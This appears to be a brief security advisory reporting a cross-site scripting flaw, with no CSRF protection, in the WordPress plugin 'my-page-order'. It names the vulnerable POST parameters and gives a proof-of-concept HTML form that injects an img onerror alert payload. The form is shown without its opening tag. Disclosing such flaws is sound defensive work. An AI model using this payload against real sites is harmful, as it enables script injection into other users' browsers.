Hello,
1. Cross-Site Scripting (XSS)
Authenticated users (like editors) can inject html/js code (there is no CSRF protection).
Method: POST
Vulnerable parameters: pages, hdnParentID
Example PHP callstack:
mypageorder [/tmp/wpplugin/my-page-order/mypageorder.php:105]
Verification:
--
<input type="text" name="btnSubPages" value="1" />
<input type="text" name="pages" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--
--
Regards,
Marcin Probola,